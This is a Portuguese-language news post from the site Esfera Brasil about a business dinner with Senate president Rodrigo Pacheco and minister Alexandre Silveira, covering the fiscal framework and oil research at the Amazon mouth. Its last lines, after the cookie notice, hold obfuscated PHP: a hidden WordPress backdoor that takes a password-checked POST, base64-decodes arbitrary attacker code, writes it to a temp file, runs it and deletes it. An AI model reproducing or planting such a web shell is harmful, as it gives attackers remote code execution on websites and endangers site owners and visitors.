• 23.05.2023
  • Redação

Esfera Brasil recebe Rodrigo Pacheco

Nesta segunda-feira, 22, recebemos o presidente do Senado, Rodrigo Pacheco, e o ministro de Minas e Energia, Alexandre Silveira, em um jantar com alguns dos principais empresários do País. O encontro tratou do mais atual cenário político-econômico brasileiro, com falas e perguntas sobre o novo arcabouço fiscal, sustentabilidade e pesquisa, investimentos, voto de qualidade do Conselho de Administração de Recursos Fiscais (Carf), equilíbrio institucional, democracia e, claro, a importância do diálogo no contexto da busca pelo desenvolvimento do Brasil.

Mantendo uma postura neutra em meio à polarização, já bastante comum à sociedade brasileira, Pacheco defendeu que os empresários presentes observem o País por uma perspectiva positiva. “Nós devemos, diante de um novo governo eleito, de novas perspectivas, de novas ideias de iniciativas, ter otimismo com o Brasil”, disse o presidente do Senado.

Em respaldo à Casa que preside e ao Congresso, o qual também comanda, o senador elogiou o parlamento, que, segundo ele, apesar da sucessão de acontecimentos turbulentos nos últimos dez anos, foi capaz de aprovar uma série de medidas fundamentais para o Brasil, como as reformas trabalhista e da Previdência, o estabelecimento do teto de gastos, o marco do saneamento, a capitalização da Eletrobras, a autonomia do Banco Central, entre outras.

“Tudo o que foi feito é uma revelação de que o Congresso Nacional, nesses últimos anos, não só na minha gestão, mas na gestão do Davi [Alcolumbre], do Eunício [Oliveira] e do Renan [Calheiros], foi comprometido com reformas importantes para o Brasil”, afirmou Pacheco. “No Brasil, estamos em um momento de equilíbrio institucional, de equilíbrio entre os Poderes, que se conversam. Há um ambiente que favorece o diálogo sobre o objetivo comum, que é alcançar um Brasil melhor”, acrescentou.

Em entrevista à equipe da Esfera Brasil, Pacheco se disse otimista para a aprovação da nova regra fiscal, tanto na Câmara, onde o texto deve ser votado nos próximos dias, quanto no Senado.

Petróleo na foz do Amazonas

Representante do Poder Executivo no encontro, o ministro Silveira, sentado ao lado de Pacheco, comentou sobre o recente imbróglio da pesquisa para que se possa explorar petróleo na foz do Rio Amazonas, principalmente na região que compreende o estado do Amapá – embora signifique o início de um projeto que pode abranger também todo o Nordeste brasileiro, incluindo ainda a exploração de gás natural.

“Todos sabem a nossa posição pública nesse sentido, e ela tem muita coerência com aquilo que vem ditando o presidente Lula desde o princípio: nós precisamos nos equilibrar entre o desenvolvimento econômico e a questão ambiental”, explicou o ministro. “Não há transigência e não haverá transigência do governo com relação à legalidade da questão ambiental, mas não é disso que estamos tratando. A Petrobras afirma e reafirma que cumpriu todas as etapas necessárias e imprescindíveis à emissão dessa licença, que, como muito bem disse João [Camargo, presidente do Conselho da Esfera], ainda não é um processo de exploração, mas apenas um processo de pesquisa”, complementou.

Vale lembrar que, na semana passada, depois que o nosso Seminário Brasil Hoje esquentou o assunto da exploração de petróleo na região, a ministra do Meio Ambiente e Mudança do Clima, Marina Silva, e o presidente do Ibama, Rodrigo Agostinho, se declararam contrários à ideia.

“Seria uma incoerência a gente não poder sequer conhecer essa riqueza. Eu defendo contundentemente que nós tenhamos um diagnóstico o mais rápido possível, para que a gente possa, num futuro breve, ser o grande protagonista da transição energética no mundo”, disse Silveira, que também destacou ter o “mais extremo respeito” por Marina e Agostinho. Pacheco acenou na mesma direção.

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}